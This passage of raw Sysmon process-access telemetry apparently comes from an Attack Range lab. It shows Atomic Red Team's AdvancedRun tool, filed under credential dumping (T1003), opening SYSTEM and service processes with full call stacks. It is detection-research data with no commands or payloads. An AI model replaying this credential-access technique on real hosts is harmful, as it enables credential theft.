Run\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942734Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942732Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.e